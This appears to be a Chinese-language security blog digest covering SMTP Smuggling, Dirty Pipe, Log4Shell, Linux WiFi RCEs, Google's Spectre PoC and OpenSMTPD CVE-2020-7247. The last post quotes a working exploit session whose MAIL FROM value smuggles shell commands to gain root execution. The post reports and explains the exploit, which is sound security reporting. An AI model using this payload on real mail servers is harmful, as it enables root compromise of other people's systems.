SMTP Smuggling 的安全漏洞 (LF 的問題),以及 Postfix 被無視的問題

Hacker News 上看到「SMTP Smuggling – Spoofing Email Worldwide (」這個攻擊,原文在「SMTP Smuggling - Spoofing E-Mails Worldwide」。

開頭的圖片把大方向解釋出來了,這是利用不同的 SMTP server 實作上對怎麼結束 DATA 的處理方式不同,這個問題會出現在兩組 SMTP server 丟信件時:

更細節的說,是遇到對於非 \r\n.\r\n (非 CRLF) 的處理方式不同時,就會產生出可以攻擊的空間:

這樣的攻擊因為可以偽造所有的 header,加上內部 SMTP server 在 IP 層看不到實際的 IP,就可以讓攻擊者完全繞過 SPF 檢查的部分。

從 SMTP 規格說起,在 SMTP 規格上都是用 \r\n (CRLF) 當作換行,這點從 1982 年 (41 年前) 已經 obsoleted 的 RFC 821 可以看到裡面全部都是使用 \r\n 當作換行。

後來更新的 RFC 2821 (2001,也已經 obsoleted) 與 RFC 5321 (2008,目前的標準) 則是除了描述 \r\n.\r\n 外,有提到禁止把 \n.\n 當作 DATA 的結尾辨識:

In particular, the sequence "<LF>.<LF>" (bare line feeds, without carriage returns) MUST NOT be treated as equivalent to <CRLF>.<CRLF> as the end of mail data indication.

但除了被禁止的 \n.\n 外,這次的攻擊用了其他的排列組合嘗試。

在 GMX、Ionos 以及 Microsoft Exchange Online 的 SMTP server 上發現都吃 \n.\r\n

However, as already mentioned, SMTP smuggling doesn't work for every receiving inbound SMTP server and, in this case, requires inbound SMTP servers to accept <LF>.<CR><LF> as end-of-data sequence.

Same as GMX and Ionos, Exchange Online allowed smuggling via a <LF>.<CR><LF> end-of-data sequence as well, which makes it possible to smuggle from every domain pointing their SPF record to Exchange Online.

而 Cisco Secure Email (Cloud) Gateway 支援 \r.\r

By default, Cisco Secure Email (Cloud) Gateway accepts . as end-of-data sequence, which does not get filtered by the following SMTP servers when sending outbound:

另外看了一下 Postfix 這邊的情況,可以看到「SMTP Smuggling」這份資料,裡面可以看到 Postfix 因為預設支援 \n.\r\n 也受到影響:

One different email service B that does support broken line endings in SMTP such as in <LF>.<CR><LF>.

Postfix is an example of email service B.

然後可以看到作者 Wietse Venema 直接在業面上公開點名 SEC Consult (這次安全漏洞的發現者) 沒有先聯絡的問題:

Unfortunately, criticial information provided by the researcher was not passed on to Postfix maintainers before publication of the attack, otherwise we would certainly have convinced SEC Consult to change their time schedule until after people had a chance to update their Postfix systems.

在 Postfix 的 e-mail 公告「[pfx-ann] SMTP Smuggling, workarounds and fix」裡面講的更硬 (non-responsible disclosure process):

As part of a non-responsible disclosure process, SEC Consult has published an email spoofing attack that involves a composition of email services with specific differences in the way they handle line endings other than <CR><LF>.

從最早的 snapshot (20231218105045 這份) 可以確認他們有發現 Postfix 的問題,但 timeline 上沒有接觸 Postfix 的團隊。

後續的更新把溝通問題推給了 CERTVINCE platform

As documented in the timeline of the blog post, the vulnerabilities were initially identified in June 2023 and after further internal research we contacted the specific, affected vendors (Microsoft, Cisco, GMX/Ionos). GMX and Microsoft fixed the issues promptly. But after receiving some feedback from Cisco, that our identified vulnerability is just a feature of the software and not a bug/vulnerability, we contacted CERT/CC on 17th August to get some help for further discussion with Cisco and involve other potentially affected vendors (such as sendmail) through the VINCE communication platform.

現在 community 這邊則是在醞釀提議取消他們在 37c3 上面的 talk:「」。


Hacker News Daily 上看到的,英國政府也建立了自己的掃描資料庫:「NCSC Scanning information」。

看起來是類似於 Shodan 這樣的服務,但是範圍限制在英國內的網路服務:

These activities cover any internet-accessible system that is hosted within the UK and vulnerabilities that are common or particularly important due to their high impact.


Linux 無線網路的 RCE 洞

Hacker News 首頁上看到 Linux 無線網路的 RCE 漏洞:「Some remotely exploitable kernel WiFi vulnerabilities」,mailing list 的信件是這邊:「[oss-security] Various Linux Kernel WLAN security issues (RCE/DOS) found」。

裡面題到了五個漏洞,其中屬於 RCE 的是這三個:

  • CVE-2022-41674: fix u8 overflow in cfg80211_update_notlisted_nontrans (max 256 byte overwrite) (RCE)
  • CVE-2022-42719: wifi: mac80211: fix MBSSID parsing use-after-free use after free condition (RCE)
  • CVE-2022-42720: wifi: cfg80211: fix BSS refcounting bugs ref counting use-after-free possibilities (RCE)

第一個只寫「An issue was discovered in the Linux kernel through 5.19.11.」,但討論上看到說應該是 5.1+,第二個在 CVE 裡面有提到是 5.2+,第三個是 5.1+。然後已經有看到 PoC code 了...

對於用 Linux 筆電的人得等各家 distribution 緊急出更新;但有些無線網路設備不知道怎麼辦...

最近 Linux 核心安全性問題的 Dirty Pipe 故事很有趣...

Hacker News 上看到「The Dirty Pipe Vulnerability」這個 Linux kernel 的安全性問題,Hacker News 上相關的討論在「The Dirty Pipe Vulnerability (」這邊可以看到。

這次出包的是 splice() 的問題,先講他寫出可重製 bug 的程式碼,首先是第一個程式用 user1 放著跑:

#include <unistd.h>
int main(int argc, char **argv) {
  for (;;) write(1, "AAAAA", 5);
// ./writer >foo

然後第二個程式也放著跑 (可以是不同的 user2,完全無法碰到 user1 的權限):

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
// ./splicer <foo |cat >/dev/null

理論上不會在 foo 裡面看到任何 BBBBB 的字串,但卻打穿了... 透過 git bisect 的檢查,他也確認了是在「pipe: merge anon_pipe_buf*_ops」這個 commit 時出的問題。

不過找到問題的過程拉的頗長,一開始是有 web hosting 服務的 support ticket 說 access log 下載下來發現爛掉了,無法解壓縮:

It all started a year ago with a support ticket about corrupt files. A customer complained that the access logs they downloaded could not be decompressed. And indeed, there was a corrupt log file on one of the log servers; it could be decompressed, but gzip reported a CRC error.


I fixed the file’s CRC manually, closed the ticket, and soon forgot about the problem.

接下來過幾個月後又發生,經過幾次的 support ticket 後他手上就有一些「資料」可以看:

Months later, this happened again and yet again. Every time, the file’s contents looked correct, only the CRC at the end of the file was wrong. Now, with several corrupt files, I was able to dig deeper and found a surprising kind of corruption. A pattern emerged.


None of this made sense, but new support tickets kept coming in (at a very slow rate). There was some systematic problem, but I just couldn’t get a grip on it. That gave me a lot of frustration, but I was busy with other tasks, and I kept pushing this file corruption problem to the back of my queue.

後來真的花時間下去找,利用先前的 pattern 掃了一次系統 log,發現有規律在:

External pressure brought this problem back into my consciousness. I scanned the whole hard disk for corrupt files (which took two days), hoping for more patterns to emerge. And indeed, there was a pattern:

  • there were 37 corrupt files within the past 3 months
  • they occurred on 22 unique days
  • 18 of those days have 1 corruption
  • 1 day has 2 corruptions (2021-11-21)
  • 1 day has 7 corruptions (2021-11-30)
  • 1 day has 6 corruptions (2021-12-31)
  • 1 day has 4 corruptions (2022-01-31)

The last day of each month is clearly the one which most corruptions occur.

然後就試著寫各種 reproducible code,最後成功的版本就是開頭提到的,然後他發現這個漏洞可以是 security vulnerability,就回報出去了,可以看到前後從第一次的 support ticket 到最後解決花了快一年的時間,不過 Linux kernel 端修正的速度蠻快的:

  • 2021-04-29: first support ticket about file corruption
  • 2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability
  • 2022-02-20: bug report, exploit and patch sent to the Linux kernel security team
  • 2022-02-21: bug reproduced on Google Pixel 6; bug report sent to the Android Security Team
  • 2022-02-21: patch sent to LKML (without vulnerability details) as suggested by Linus Torvalds, Willy Tarreau and Al Viro
  • 2022-02-23: Linux stable releases with my bug fix (5.16.11, 5.15.25, 5.10.102)
  • 2022-02-24: Google merges my bug fix into the Android kernel
  • 2022-02-28: notified the linux-distros mailing list
  • 2022-03-07: public disclosure

整個故事還蠻精彩的 XD

GitHub 放出了他們整理過的 GitHub Advisory Database

GitHub 宣佈開放他們整理過的 GitHub Advisory Database:「GitHub Advisory Database now open to community contributions」,Hacker News 上有 GitHub 的 PM 回答一些問題,也可以看看:「GitHub’s database of security advisories is now open source (」。

對應的 repository 在「github/advisory-database」這邊可以看到,用的格式是 Open Source Vulnerability format,裡面都是 JSON 檔案。

裡面看起來是從 2017/10 開始的資料,這樣算起來大約累積了四年半,算是一個來源...

受到 Log4j2 影響的清單

最近大家都在忙著補 Log4j2 的安全漏洞 (先前在「Log4j2 的 RCE」這邊有提到),有人整理了目前受到影響的軟體的清單以及對應的討論連結:「Log4Shell log4j vulnerability (CVE-2021-44228) - cheat-sheet reference guide」。


然後 Cloudflare 的 CEO Matthew Prince 在 Twitter 上有提到從他們家的資料看起來,2021/12/01 就已經有攻擊在外面跑了,這也是之前會說這是 0-day 的原因:

Log4j2 的 RCE

昨天爆出來 Log4j2 的 RCE,看了一下 pattern,只要是 Java stack 應該都很容易中獎:「Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package」,Hacker News 上對應的討論在「Log4j RCE Found (」這邊可以看。

LunaSec 宣稱這是 0-day RCE,不過 Log4j2 的修正版本 2.15.0 在 2021/12/06 出了,而 exploit 被丟出來是 2021/12/09,但不確定在這之前是不是已經有 exploit 在 internet 上飛來飛去了...

丟出來的 exploit sample (CVE-2021-44228-Apache-Log4j-Rce) 是用 LDAP 來打,雖然大多數的 Java 版本不受影響,但還是有其他的面可以攻擊,所以整體上還是很容易打穿,該升級的還是得趕快升級:

Updates (3 hours after posting): According to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load remote code using LDAP.

However, there are other attack vectors targeting this vulnerability which can result in RCE. An attacker could still leverage existing code on the server to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.


Google 釋出網頁版的 Spectre 攻擊 PoC,包括 Apple M1 在內

在大約三年前 (2018 年年初) 的時候,在讀完 Spectre 之後寫下了一些記錄:「讀書時間:Spectre 的攻擊方式」,結果在 Bruce Schneier 這邊看到消息,Google 前幾天把把 PoC 放出來了:「Exploiting Spectre Over the Internet」,在 Hacker News 上也有討論:「A Spectre proof-of-concept for a Spectre-proof web (」。

首先是這個攻擊方法在目前的瀏覽器都還有用,而且包括 Apple M1 上都可以跑:

The demonstration website can leak data at a speed of 1kB/s when running on Chrome 88 on an Intel Skylake CPU. Note that the code will likely require minor modifications to apply to other CPUs or browser versions; however, in our tests the attack was successful on several other processors, including the Apple M1 ARM CPU, without any major changes.

即使目前的瀏覽器都已經把 改為 1ms 的精度,也還是可以達到 60 bytes/sec 的速度:

While experimenting, we also developed other PoCs with different properties. Some examples include:

  • A PoC which can leak 8kB/s of data at a cost of reduced stability using as a timer with 5μs precision.
  • A PoC which leaks data at 60B/s using timers with a precision of 1ms or worse.

比較苦的消息是 Google 已經確認在軟體層沒辦法解乾淨,目前在瀏覽器上只能靠各種 isolation 降低風險,像是將不同站台跑在不同的 process 裡面:

In 2019, the team responsible for V8, Chrome’s JavaScript engine, published a blog post and whitepaper concluding that such attacks can’t be reliably mitigated at the software level. Instead, robust solutions to these issues require security boundaries in applications such as web browsers to be aligned with low-level primitives, for example process-based isolation.

Apple M1 也中這件事情讓人比較意外一點,看起來是當初開發的時候沒評估?目前傳言的 M1x 與 M2 不知道會怎樣...


上個禮拜丟出來很轟動的一篇「side project」,三個月不斷的打穿蘋果的企業網路:「We Hacked Apple for 3 Months: Here’s What We Found」,對應的 Hacker News 討論可以在「We Hacked Apple for 3 Months (」這邊看到。


This was originally meant to be a side project that we'd work on every once in a while, but with all of the extra free time with the pandemic we each ended up putting a few hundred hours into it.

這是五個人通力合作打了三個月出來的成果,依照他們的回報數字,共打出了 55 個「洞」,考慮到週休的情況,幾乎是天天打洞出來玩:

There were a total of 55 vulnerabilities discovered with 11 critical severity, 29 high severity, 13 medium severity, and 2 low severity reports. These severities were assessed by us for summarization purposes and are dependent on a mix of CVSS and our understanding of the business related impact.

文章裡沒有對每個安裝漏洞都描述,但有針對一些比較「有趣」的漏洞說明,雖然看了以後知道是怎麼一回事,但對這些手法沒這麼熟,你叫我打我還是不會打啊 XDDD 反而是當作表演藝術來看...


在「OpenBSD OpenSMTPD Remote Code Execution Vulnerability (CVE-2020-7247)」這邊看到頗意外的 OpenSMTPD RCE,而且從「Qualys Security Advisory LPE and RCE in OpenSMTPD (CVE-2020-7247)」這邊的範例可以看到是個淺顯易懂的 exploit:

$ nc 25
HELO professor.falken
250 Hello professor.falken [], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
250 2.1.5 Destination address valid: Recipient ok
354 Enter mail, end with "." on a line by itself

for i in W O P R; do
        echo -n "($i) " && id || break
done >> /root/x."`id -u`"."$$"
250 2.0.0 4cdd24df Message accepted for delivery
221 2.0.0 Bye
